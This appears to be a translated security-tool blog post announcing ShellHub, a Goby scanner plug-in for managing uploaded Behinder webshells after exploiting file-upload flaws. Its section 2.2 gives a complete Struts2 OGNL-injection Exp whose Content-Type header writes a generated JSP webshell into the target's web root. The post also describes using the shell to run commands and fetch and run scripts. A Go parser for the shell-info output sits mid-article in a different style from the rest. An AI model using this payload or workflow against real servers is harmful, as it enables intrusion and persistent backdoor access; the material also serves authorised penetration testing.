Plug-in sharing | ShellHub lets Goby carry the penetration process through to the end

Foreword: successfully landing a webshell during a penetration test or HW engagement is undoubtedly exciting. Until now, Goby's Exp flow for file upload vulnerabilities has been to try to obtain a webshell; unless the shell type is restricted, a Behinder ("ice scorpion") shell is uploaded by default. If all goes well, the Exp prints the webshell URL, password and management tool, and the user copies this information into the corresponding management tool and connects. We kept wondering whether there could be a more elegant way to complete this process: just like Goby's existing reverse shell function, click the "open shell" button to pop up a management interface for the webshell and operate it directly. To further streamline the exploitation flow and improve the user experience, the ShellHub plug-in now arrives~

This plug-in is applicable to Goby version: beta version 1.9.307

After reading the article, you can find the way to obtain the internal test version at the end of the article ↓

0x01 Plug-in demonstration

First, use Vulfocus to quickly spin up a Struts2 vulnerability environment for the demonstration.

  • Previous process: run the Exp, which returns the webshell information; the user manually copies it into the management tool.
  • Process with the plug-in: run the Exp to get the webshell -> manage the webshell seamlessly with one click.



0x02 How to write an Exp that can be managed with one click

To get one-click management, the only requirement is that the output returned by the file upload vulnerability's Exp includes three pieces of information: the webshell address, the webshell connection password and the webshell connection tool, as in the following example:

WebShell URL: http://vulfocus.fofa.so:44482/kGMklMBK.jsp
Password: JCsiJt
WebShell tool: Behinder v3.0

2.1 Go code Exp output example

expResult.Success = true
// Each line must end with a newline ("\n")
expResult.Output = "Webshell: " + expResult.HostInfo.FixedHostInfo + "/xxxx.jsp\n"
expResult.Output += "Password: f8082d22\n"
expResult.Output += "Webshell tool: Behinder v3.0"

2.2 JSON Exp example

"set_variable": [
  "file|genshell|exp|B:jsp"
]
// "file" is the variable name and can be chosen freely. The variable is actually an array; when it is placed in the HTTP request header or body, its value is a probe of the form
// <?php echo md5(<random value>); unlink(__FILE__); ?>
// "exp" means a webshell is to be uploaded
// "B:jsp" means generate a Behinder JSP shell; similarly, "G:jspRaw" means generate a Godzilla raw-type JSP shell

"SetVariable": [
    "output|define|shell_info|/xx/yy/{{{random shell file name variable}}}"
]
// In EXP mode, after the webshell has been uploaded, the matching step prints the shell's
// connection URL and connection password (or key).
// shell_info is used to print the prompt information; it produces output like the following:
// WebShell URL: http://vulfocus.fofa.so:44482/kGMklMBK.jsp
// Password: JCsiJt
// WebShell tool: Behinder v3.0
// The fourth field only needs the relative path of the shell, such as /xx/yy/{{{random shell file name variable}}}
"ExploitSteps": [
    "AND",
    {
        "Request":{
            "set_variable":[
                "name|rand|str|8",
                "name|name|concat|.jsp",
                "file|genshell|exp|B:jsp"
            ],
            "method":"POST",
            "uri":"/",
            "follow_redirect":true,
            "header":{
                "Content-Type":"%{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#req=(@org.apache.struts2.ServletActionContext@getRequest())).(#path1=#req.getRealPath('/')).(#sb=(new java.lang.StringBuilder(#path1))).(#path=#sb.append('/{{{name}}}')).(#shell='{{{file}}}').(#file=new java.io.File(#path)).(#fw=new java.io.FileWriter(#file)).(#fw.write(#shell)).(#fw.flush()).(#fw.close()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getWriter())).(#ros.print('UPLO')).(#ros.println('AD-OK')).(#ros.flush())}"
            },
            "data_type":"text",
            "data":""
        },
        "ResponseTest":{
            "type":"group",
            "operation":"AND",
            "checks":[
                {
                    "type":"item",
                    "variable":"$body",
                    "operation":"contains",
                    "value":"UPLOAD-OK",
                    "bz":""
                }
            ]
        },
        "SetVariable":[
            "output|define|shell_info|/{{{name}}}"
        ]
    }
]
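The three-line record described in 2.1 and 2.2 is the whole contract between an Exp and the plug-in, so it is worth seeing how a consumer would read it defensively. The following is an added example, not Goby's or the ShellHub plug-in's own code: it parses the record into a structured value, accepts both label spellings that appear above ("Webshell:" from the Go snippet and "WebShell URL:" from the displayed output), and fails closed when a field is missing, duplicated, the URL is not an absolute http(s) URL, or the tool is not on an allow-list. The ShellInfo type, the ParseShellInfo function and the allow-list are assumptions of this example; the sample input reuses the values shown in the article.

```go
package main

import (
	"bufio"
	"errors"
	"fmt"
	"net/url"
	"strings"
)

// ShellInfo is the structured form of the three-line record an Exp prints.
// (Type name is an assumption of this example.)
type ShellInfo struct {
	URL      *url.URL
	Password string
	Tool     string
}

// labelKeys maps the labels used in the article to canonical field names.
// Both spellings from the article are accepted: "Webshell:" (the Go snippet)
// and "WebShell URL:" (the displayed output). Lookup is case-insensitive.
var labelKeys = map[string]string{
	"webshell":      "url",
	"webshell url":  "url",
	"password":      "password",
	"webshell tool": "tool",
}

// knownTools is the allow-list of tools this consumer can drive. Only
// Behinder v3.0 is listed because the article's plug-in integrates Behinder
// first; an unknown tool is rejected rather than silently accepted.
var knownTools = map[string]bool{
	"Behinder v3.0": true,
}

// sampleOutput is the record shown in the article, embedded here as demo input.
const sampleOutput = "WebShell URL: http://vulfocus.fofa.so:44482/kGMklMBK.jsp\n" +
	"Password: JCsiJt\n" +
	"WebShell tool: Behinder v3.0"

// ParseShellInfo extracts URL, password and tool from Exp output text.
// It tolerates blank lines, CRLF endings and unrelated lines, and fails
// closed when a field is missing, duplicated or malformed.
func ParseShellInfo(output string) (*ShellInfo, error) {
	fields := map[string]string{}
	sc := bufio.NewScanner(strings.NewReader(output))
	for sc.Scan() {
		line := strings.TrimSpace(sc.Text())
		sep := strings.IndexByte(line, ':')
		if line == "" || sep < 0 {
			continue // blank line or not a "label: value" line
		}
		label := strings.ToLower(strings.TrimSpace(line[:sep]))
		key, known := labelKeys[label]
		if !known {
			continue // unrelated line; Exps may print extra text
		}
		if _, dup := fields[key]; dup {
			return nil, fmt.Errorf("duplicate field %q", key)
		}
		fields[key] = strings.TrimSpace(line[sep+1:])
	}
	for _, k := range []string{"url", "password", "tool"} {
		if fields[k] == "" {
			return nil, fmt.Errorf("missing field %q", k)
		}
	}
	u, err := url.Parse(fields["url"])
	if err != nil || (u.Scheme != "http" && u.Scheme != "https") || u.Host == "" {
		return nil, errors.New("webshell URL is not an absolute http(s) URL")
	}
	if !knownTools[fields["tool"]] {
		return nil, fmt.Errorf("unsupported webshell tool %q", fields["tool"])
	}
	return &ShellInfo{URL: u, Password: fields["password"], Tool: fields["tool"]}, nil
}

func main() {
	info, err := ParseShellInfo(sampleOutput)
	if err != nil {
		fmt.Println("parse error:", err)
		return
	}
	fmt.Printf("host=%s path=%s tool=%s\n", info.URL.Host, info.URL.Path, info.Tool)
}
```

Rejecting unknown tools and relative URLs matters because the record is produced by whatever Exp ran, including third-party ones: a consumer that "does its best" with a half-formed record would hand the user a connection it cannot actually make, or one pointing somewhere other than the host the Exp reported.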

2.3 ShellHub function points

When we started writing this plug-in, our goal was to hook the mainstream webshells into the exploitation flow and then make it convenient to drive the webshell directly from code: for example, automatically running a specified group of commands after obtaining the webshell, automatically downloading and executing an sh script to collect system information, or even uploading tools for direct scanning.

Among today's mainstream webshell management tools, Behinder ("ice scorpion"), Godzilla and AntSword are the three pillars. After much deliberation, considering reach, breadth and user habits, we chose to integrate the Behinder shell first. The result is that the plug-in connects directly to a Behinder shell (of course, there are still many rough edges). The function points currently supported by the plug-in are listed below.

Supported function points | JSP | XJSP | PHP | ASPX | ASP
Basic information         |     |      |     |      |
File management (partial) |     |      |     |      |
Command execution         |     |      |     |      |
To be continued           |     |      |     |      |

0x03 Summary

As for the choice of function points, we did not try to implement all of Behinder's existing functions in one go. Our reasoning is that specialised work is best left to the specialist tool: anyone who needs Behinder's other functions can manage the shell directly in the Behinder client. That is also why we still print the webshell's connection address and password. Of course, if users have other needs while using the plug-in, they are welcome to talk to us.

Tip: because Behinder is so widely used, its C# payload (a DLL file) may be flagged as malicious. This plug-in only changes the DLL's file name.

Because this plug-in needs matching front-end UI and interaction, you must download Goby beta version 1.9.307 to use it.

How to get the internal test version:

  • WeChat group: send the code "join group" to the official account.

Plug-in development documentation:

https://gobies.org/docs.html


There is also a detailed plug-in development tutorial on Bilibili; you are welcome to drop by the comment (danmaku) section~

If you, too, want to contribute to the community (and get the Red Team Special Edition), click here to pick up a plug-in task.

Tags: security IDE webshell

Posted on Fri, 05 Nov 2021 18:46:34 -0400 by mpirvul